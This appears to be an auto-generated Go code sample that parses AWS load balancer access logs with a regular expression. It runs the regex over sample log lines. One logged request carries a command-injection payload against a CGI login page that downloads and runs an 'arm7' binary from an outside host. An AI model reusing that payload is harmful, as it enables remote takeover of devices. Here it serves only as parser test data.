package main
import (
"regexp"
"fmt"
)
func main() {
var re = regexp.MustCompile(`(?m)^(?P<alb_type>(https?|h2|wss?))\s*(?P<alb_timestamp>[^\s]+)\s*(?P<alb_elb>[^\s]+)\s*(?P<alb_client_addr>[^:]+):\s*(?P<alb_client_port>[^\s]+)\s*(?P<alb_target_addr>-)\s*(?P<alb_request_processing_time>[^\s]+)\s*(?P<alb_target_processing_time>[^\s]+)\s*(?P<alb_response_processing_time>[^\s]+)\s*(?P<alb_elb_status_code>[^\s]+)\s*(?P<alb_target_status_code>[^\s]+)\s*(?P<alb_received_bytes>[^\s]+)\s*(?P<alb_sent_bytes>[^\s]+)\s*"(?P<alb_request>.*?)"\s+"(?P<alb_user_agent>[^\"]+)"\s*(?P<alb_ssl_cipher>[^\s]+)\s*(?P<alb_ssl_protocol>[^\s]+)\s*(?P<alb_target_group_arn>[^\s]+)\s*"(?P<alb_trace_id>[^\"]+)"\s*"(?P<alb_domain_name>[a-zA-Z0-9\.\-:]+)"\s*"(?P<alb_chosen_cert_arn>[^\"]+)"\s*(?P<alb_matched_rule_priority>[^\s]+)\s*(?P<alb_request_creation_time>[^\s]+)\s*\s*"(?P<alb_actions_executed>[^\s]+)"\s*"(?P<alb_redirect_url>[^\s]+)"\s*"(?P<alb_error_reason>[^\"]+)"\s*"?(?P<alb_target_port_list>[0-9 :\.-]+)"?\s*"?(?P<alb_target_status_code_list>[0-9 -]+)"?`)
var str = `https 2020-04-16T22:12:33.005975Z app/4da01abcd-prod-mer-c3e3/5b28cd8a0000e9ade 12.20.0.124:40802 - -1 -1 -1 400 - 163 288 "POST http://4da14ddd-prod-mergedextern-c3e3-212123456.us-east-1.elb.amazonaws.com:80/form/admin/formPin HTTP/1.1" "polaris botnet" - - - "-" "-" "-" - 2020-04-16T22:12:33.005000Z "-" "-" "-" "-" "-"
http 2020-04-16T22:58:45.017441Z app/4da14ddd-prod-mer-c3e3/7f28ba8e991e9ade 89.12.16.13:52263 - -1 -1 -1 400 - 266 288 "POST http://3ca14abc-prod-mer-c3e3-2129123456.us-east-1.elb.amazonaws.com:80/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh$"cd${IF}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IF}busybox${IFS}cget${IFS}http://19ce0f.grok.im/arm7;${IFS}chmod${IFS}77${IFS}arm7;${IFS}./arm7"%0A%2&logUser=a&loginPwd=a HTTP/1.1" "-" - - - "-" "-" "-" - 2020-04-16T22:58:45.017000Z "-" "-" "-" "-" "-"
https 2020-04-17T00:03:31.610273Z app/4da10abc-prod-mer-c3e3/7f28ba8e881e0ade 74.7.15.100:33766 - -1 -1 -1 400 - 0 0 "- https://4da14eee-prod-mer-c3e3-2129577269.us-east-1.elb.amazonaws.com:443- -" "-" ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 - "-" "-" "arn:aws:acm:us-east-1:57257000000:certificate/ae07b666-1ee3-4b79-bde5-022ddee00a21" - 2020-04-17T00:03:31.610000Z "-" "-" "-" "-" "-"
https 2020-04-17T00:03:30.285233Z app/4da1eeee-prod-mer-c0a0/7f28ba8e000e9adf 604.2.14.6:33547 - -1 -1 -1 400 - 0 0 "- https://4da14ddd-prod-mergedextern-c3e3-2129123456.us-east-1.elb.amazonaws.com:443- -" "-" ECDHE-RSA-AES128-SHA TLSv1 - "-" "-" "arn:aws:acm:us-east-1:572571234567:certificate/ae07b36f-1463-4b79-bdc5-922ddee87a31" - 2020-04-17T00:03:30.285000Z "-" "-" "-" "-" "-"
https 2020-04-17T00:05:41.560192Z app/4da00eee-prod-mer-c3e3/7f28ba8e991e9ade 209.17.96.66:54201 - -1 -1 -1 404 - 139 167 "GET https://34.202.223.200:443/ HTTP/1.1" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 - "Root=1-5e98d123c-ea7e5a803e7abcab79cb0772" "3.102.123.345:443" "arn:aws:acm:us-east-1:572512345678:certificate/ae07a00c-1426-4b00-bdc5-123abce87a31" 0 2020-04-17T00:05:41.560000Z "fixed-response" "-" "-" "-" "-"
`
for i, match := range re.FindAllString(str, -1) {
fmt.Println(match, "found at index", i)
}
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Golang, please visit: https://golang.org/pkg/regexp/